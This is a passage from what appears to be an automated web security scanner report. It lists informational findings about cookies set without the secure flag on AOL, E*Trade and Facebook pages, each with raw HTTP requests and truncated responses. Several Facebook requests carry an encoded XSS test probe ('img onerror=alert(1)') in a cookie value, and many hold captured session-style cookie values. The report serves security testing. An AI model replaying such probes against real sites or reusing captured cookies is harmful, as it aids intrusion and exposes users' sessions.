Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:42 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557422&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/
Content-Type: application/x-javascript;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Connection: close


var _sns_sd_rev="$Revision: 1.56 $";
var snshosturl="",wscinstalled=0,i=0,_sns_var_="",lu="",la="",loginId="",nmvalpos=0,_sns_width_=174,_sns_height_=198,frameAlreadyInserted=false,snsdata="",
...[SNIP]...

10.12. https://my.screenname.aol.com/_cqr/login/login.psp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_cqr/login/login.psp?offerId=aol-com-jv3-en-us&sitedomain=startpage.aol.com&siteState=http://www.aol.com&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
Referer: https://new.aol.com/productsweb/?promocode=825345&ncid=txtlnkuswebr00000106
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-xwt4pvwxgiNuEXsL62c8YI2ZXtszwMu%2F; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgV1c0Nitaem4vb3ZIUFYzcGJTengxR3c1dlF3PQ%3D%3D-wxKeSTWr4DGDDkp%2Bthu0P5TkNGCsNglO5cHXCh0P1RL8MIMzkoTUBhBMZ2PpkNq2C2DvE9bN2WYXgim8PnrLlSYn2or1%2F5ga4UFQ3vsO5jfTwGowZx4%2FJc88sm2suX6Y; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557220&1&1304557220&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:00:20 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14833
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14833


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...

10.13. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /_cqr/logout/mcLogout.psp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_cqr/logout/mcLogout.psp?sitedomain=realestate.aol.com HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:42 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557422&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1520
Connection: close


    <html>
<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LA
...[SNIP]...

10.14. https://my.screenname.aol.com/badbrowser.psp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /badbrowser.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:42 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2875
Connection: close



...[SNIP]...

10.15. https://us.etrade.com/e/t/welcome/whychooseetrade

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/welcome/whychooseetrade

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/t/welcome/whychooseetrade HTTP/1.1
Host: us.etrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 10:56:01 GMT
Server: Apache
Set-Cookie: WRC_ID=173.193.214.243-1304592961929; Domain=.etrade.com; Expires=Wed, 06-Sep-2062 21:52:02 GMT; Path=/
Set-Cookie: JSESSIONID=E2E6C4CD8BD8A20698F951F8B40D2658.tomcat1; Path=/e; Secure
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<head>
<!--
...[SNIP]...

10.16. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.17. https://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.18. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.19. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.20. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.21. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.22. https://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.23. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.24. https://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.25. https://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
